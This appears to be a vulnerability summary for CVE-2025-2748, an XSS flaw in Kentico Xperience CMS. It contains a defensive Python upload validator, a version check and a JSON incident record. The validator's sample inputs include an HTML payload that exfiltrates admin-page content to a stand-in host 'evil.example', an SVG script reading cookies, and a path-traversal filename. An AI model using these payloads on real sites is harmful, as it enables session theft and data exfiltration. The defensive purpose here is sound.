Kentico

Kentico Xperience CMS, an enterprise content management system, is affected by a Cross-Site Scripting (XSS) vulnerability tracked as CVE-2025-2748 in versions up to and including 13.0.178. According to the cited report, the flaw has enabled attackers to perform unauthorized resource fetching and temporary file uploads, and the injected script then executes remotely in the browser of any user who opens the affected content. Because that script runs inside the victim's authenticated session, it can steal session tokens and read any data the victim is allowed to see; if the victim is an administrator, the attacker can pivot from the browser to the CMS's privileged functions and from there towards full server compromise. The vulnerability therefore threatens both the integrity and the confidentiality of the data managed by the CMS. Installations on a hotfix later than 13.0.178 fall outside the stated affected range; anything at or below it should be upgraded, and administrator sessions that were active while the site was exposed should be treated as potentially hijacked.
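The report above does not show the vulnerable code path, so the following is an added illustration of the general defect class it describes (script-bearing content reaching a browser through an upload endpoint in the site's own origin) together with the version check a practitioner would want. It is example code written for this page, not Kentico's code and not a reproduction of CVE-2025-2748; the allowlist, header set, sample uploads and function names are assumptions chosen for the demonstration, and the version range is simply the "up to 13.0.178" stated on this page.

```python
import re
from dataclasses import dataclass, field

# Hypothetical allowlist for a CMS media/temporary-upload endpoint (not Kentico's).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Leading bytes of each allowed format: the file body, not the client-supplied
# name, decides what the server believes it is storing.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

CONTENT_TYPES = {
    "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg",
    "gif": "image/gif", "pdf": "application/pdf",
}

_SAFE_NAME = re.compile(r"[^A-Za-z0-9._-]")

# "Versions up to 13.0.178", as stated on this page, encoded as (major, minor, hotfix).
AFFECTED_UPTO = (13, 0, 178)


@dataclass
class Verdict:
    accepted: bool
    reason: str
    stored_name: str = ""
    headers: dict = field(default_factory=dict)


def check_upload(filename: str, data: bytes) -> Verdict:
    """Validate one uploaded file and fix the headers it may later be served with."""
    # Drop any path component the client sent (../, C:\, and so on).
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return Verdict(False, "no extension")
    stem, ext = base.rsplit(".", 1)
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return Verdict(False, f"extension .{ext} not allowed")
    if not data.startswith(MAGIC[ext]):  # bytes.startswith accepts a tuple
        return Verdict(False, "content does not match extension")
    # Normalise the stored name so it cannot smuggle a second extension or
    # markup into a directory listing or a Content-Disposition header.
    safe_stem = _SAFE_NAME.sub("_", stem).replace(".", "_")[:64] or "file"
    stored = f"{safe_stem}.{ext}"
    headers = {
        # The server derives the type from the verified format, never from the client.
        "Content-Type": CONTENT_TYPES[ext],
        # Stop browsers from re-interpreting the body as HTML.
        "X-Content-Type-Options": "nosniff",
        # Download rather than render inside the site's origin (PDF viewers can run JS).
        "Content-Disposition": f'attachment; filename="{stored}"',
        # Even if something does render it, no inline script may run.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    return Verdict(True, "ok", stored, headers)


def is_affected_version(version: str) -> bool:
    """True if a 'major.minor.hotfix' string is at or below the page's stated range."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    while len(parts) < 3:  # a missing component counts as 0
        parts.append(0)
    return tuple(parts) <= AFFECTED_UPTO


# Constructed sample uploads for the demonstration (not captured from any real system).
SAMPLES = {
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "report.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
    # HTML given an image name: the classic stored-XSS payload against a naive uploader.
    "photo.png": b"<html><script>fetch('/admin').then(r=>r.text())"
                 b".then(t=>location='//evil.example/?'+btoa(t))</script></html>",
    "x.svg": b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(document.cookie)</script></svg>",
    "../../web.config": b"<configuration/>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        v = check_upload(name, body)
        print(f"{name:20} accepted={v.accepted} reason={v.reason}")
    for ver in ("13.0.178", "13.0.179"):
        print(ver, "within affected range" if is_affected_version(ver) else "outside stated range")
```

The two checks that matter here are the magic-number comparison, which rejects HTML or SVG hiding behind an image extension, and the response headers, which stop a browser from executing whatever does get stored in the site's origin; either one alone leaves a gap.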

Source: https://cybersecuritynews.com/kentico-xperience-cms-xss-vulnerability/

TPRM report: https://scoringcyber.rankiteo.com/company/kentico-software

{
  "id": "ken021040225",
  "linkid": "kentico-software",
  "type": "Vulnerability",
  "date": "4/2025",
  "severity": "100",
  "impact": "",
  "explanation": "Attack threatening the organization's existence",
  "affected_entities": [
    {
      "industry": "Software",
      "name": "Kentico Xperience CMS",
      "type": "Enterprise Content Management System"
    }
  ],
  "attack_vector": "Unauthorized resource fetching, temporary file uploads, script execution in the victim's browser",
  "description": "Kentico Xperience CMS, an enterprise content management system, is affected by a Cross-Site Scripting (XSS) vulnerability tracked as CVE-2025-2748 in versions up to and including 13.0.178. The flaw has enabled attackers to perform unauthorized resource fetching and temporary file uploads, with the injected script executing in the browser of users who open the affected content. This can lead to session hijacking, unauthorized access to sensitive data and, through a captured administrator session, potentially full server compromise, threatening the integrity and confidentiality of the data managed by the CMS.",
  "impact": {
    "data_compromised": "Sensitive data, session hijacking, potential full server compromise",
    "systems_affected": "Kentico Xperience CMS"
  },
  "title": "Kentico Xperience CMS Compromised by XSS Vulnerability (CVE-2025-2748)",
  "vulnerability_type": "Cross-Site Scripting (XSS)",
  "vulnerability_exploited": "CVE-2025-2748"
}